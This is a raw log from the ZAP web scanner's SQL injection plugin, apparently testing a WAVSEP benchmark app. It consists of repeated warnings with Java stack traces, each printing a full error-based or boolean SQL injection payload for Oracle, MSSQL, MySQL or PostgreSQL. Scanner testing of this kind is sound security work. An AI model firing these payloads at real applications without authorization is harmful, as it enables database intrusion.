org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') AND 9825=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (9825=9825) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('rAlT'='rAlT] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://') AND 9825=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (9825=9825) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND ('rAlT'='rAlT at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681255 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 1001=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (1001=1001) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('eWXA'='eWXA] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 1001=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (1001=1001) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND ('eWXA'='eWXA at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681256 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 8713=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8713=8713) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'cmyA'='cmyA] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://' AND 8713=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (8713=8713) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND 'cmyA'='cmyA at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681256 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 7362=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7362=7362) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'Tdbw'='Tdbw] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 7362=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (7362=7362) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND 'Tdbw'='Tdbw at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681262 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 4060=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (4060=4060) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://%' AND 4060=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (4060=4060) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681262 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 2097=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2097=2097) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 2097=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (2097=2097) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58))) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681264 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 2333=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2333=2333) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- xZZm] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// AND 2333=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2333=2333) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL)-- xZZm at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681264 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 5056=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5056=5056) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- DALR] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt AND 5056=CONVERT(INT,(SELECT CHAR(58)+CHAR(120)+CHAR(97)+CHAR(98)+CHAR(58)+(SELECT (CASE WHEN (5056=5056) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(117)+CHAR(97)+CHAR(113)+CHAR(58)))-- DALR at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681264 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT 5775 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5775=5775,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT 5775 FROM(SELECT COUNT(*),CONCAT(0x3a7861623a,(SELECT (ELT(5775=5775,1))),0x3a7561713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681266 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(6267=6267,1))),0x3a7561713a))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT CONCAT(0x3a7861623a,(SELECT (ELT(6267=6267,1))),0x3a7561713a)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681266 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 3652=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3652=3652) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (2455=2455] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) AND 3652=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3652=3652) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)||CHR(62))) FROM DUAL) AND (2455=2455 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9681266 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3950=3950) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58)))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://(SELECT (CHR(58)||CHR(120)||CHR(97)||CHR(98)||CHR(58))||(SELECT (CASE WHEN (3950=3950) THEN 1 ELSE 0 END))::text||(CHR(58)||CHR(117)||CHR(97)||CHR(113)||CHR(58))) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:807) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at 